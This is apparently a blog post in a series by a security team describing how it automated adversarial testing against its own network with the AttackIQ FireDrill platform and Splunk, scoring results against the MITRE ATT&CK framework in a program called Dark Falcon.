KNOWING YOUR BATTLE SPACE - PART 3
Part 2 - Review
In our last post we covered a lot of the connections between the MITRE ATT&CK framework to how we created a maturity model from it and help visualize our environment. Our topics for this discussion:
- Scoring based on multiple decision points
- Mapping Specific Security Controls to Tactics
- Visualizing results for decision makers
PART 3
In this post we will touch upon automated scoring for Dark Falcon. A big part of the Dark Falcon effort as we previously discussed is centered around the MITRE ATT&CK framework. We have identified the fact that ATT&CK utilizes tactics that an adversary may use in their desire to compromise a network. Thinking about this logically, we understood that we need to be able to perform realistic tests against our infrastructure and in turn we would be able to determine our readiness to detect and defend against these tests. Lastly, we asked ourselves how can we do this in a fully automated way so humans can keep doing human things and not waste time doing something a computer can easily do.
Build It Yourself or Work with A Trusted Partner?
Initially, while debating how to perform automated testing, we went down the path of build it ourselves from the ground up. For example, Windows PowerShell is one of the MITRE ATT&CK tactics. We could spin up an internal attack server and perform the PowerShell tactic test. This test would utilize an encoded PowerShell command to run Invoke-Mimicatz. We could keep running down the list of tactics, add the actual attack script that we would create and schedule these scripts to run automatically with something like scheduled tasks. At first this sounded like it wouldn’t be too challenging. We knew we had some talented coders on the team along with some heavy minded red team individuals and access to our own infrastructure to host the tests. We then thought about this at a much deeper level and began to understand just how quickly trying to automate the testing of the many adversarial tactics would be. For example, what about all the external to internal attacks. This would require some kind of cloud infrastructure. Who was going to maintain this when the test broke over time? Furthermore, how would we formalize a framework for each test being written. These were all great questions that needed to be answered before we went any further. It was at this point that panic began to set in because we felt like we officially hit a road block that we could not get around.
AttackIQ FireDrill
After getting over the initial shock of what we had gotten ourselves into, we decided we would work with the business to find a small piece of the budget to purchase a product out in the market. After a lot of initial searching we decided on the company AttackIQ. They have an automated adversarial testing platform called FireDrill. This platform allows us to deploy agents to any endpoint we want to run our adversarial testing on. The agent then gets intelligence from the AttackIQ cloud as to what test it is supposed to perform, when it is scheduled to run the test, and offers full reporting back to the FireDrill console with results. The results reported either a pass meaning our security control stopped the tactic from performing, a fail being the latter, or an error meaning the test was unable to run. One key differentiator that really sold us was the fact that you could link multiple attacks together to really mimic an attacker moving laterally within your network utilizing multiple tactics.
Once our testing infrastructure was in place, the last piece was how were we going to get results from FireDrill testing back into Splunk. We decided it would be easiest to utilize the FireDrill API to write this data directly back into Splunk and then perform analysis on the data. We then move the results of that data into the Dark Falcon platform to score the environment on the particular tests that were run. We then set our chosen schedule for testing to take place on a weekly basis and we were off and running.
Side Notes
While we did ultimately end up deciding to purchase a product for this portion of Dark Falcon, it is important to note there is some great work being done on the open source front to assist with the automated testing of the MITRE ATT&CK tactics. One example is by Roberto Rodriguez, his work can be found here:
Cyb3rWard0g (Roberto Rodriguez) - https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI
It is also important to note that AttackIQ at the time of this post does not have all 169 MITRE ATT&CKS in their testing platform so we did find ourselves still having to code some tactic tests. This was easy to do in MITRE because FireDrill allows for direct input of code sources that the FireDrill agent will run for you on the endpoint. For example, they have a generic script execution test that will take any custom script you want to provide as input to be run. (i.e. Encoded PowerShell, batch file, bash script)
So yea that's it. Full automated testing being run on a weekly basis across our entire security infrastructure. That about wraps up the specifics for the automated adversarial testing as it relates to Dark Falcon. For more information stay tuned for part 4 where we will discuss how we overlay the kill chain and get into the details of our Attack Profiling.
Part 4
This post in the series starts looking at an extended view of the rich data you have available in Dark Falcon. We are constantly finding new ways of interacting with the ATT&CK tactic and there ratings in our environment. What we cover in this article is just a beginning to what is possible and we are excited to hear from others on what they are doing.
Today we will cover:
- Overlaying the Kill Chain
- Internal Kill Chain vs External Kill Chain
- Attack Profiling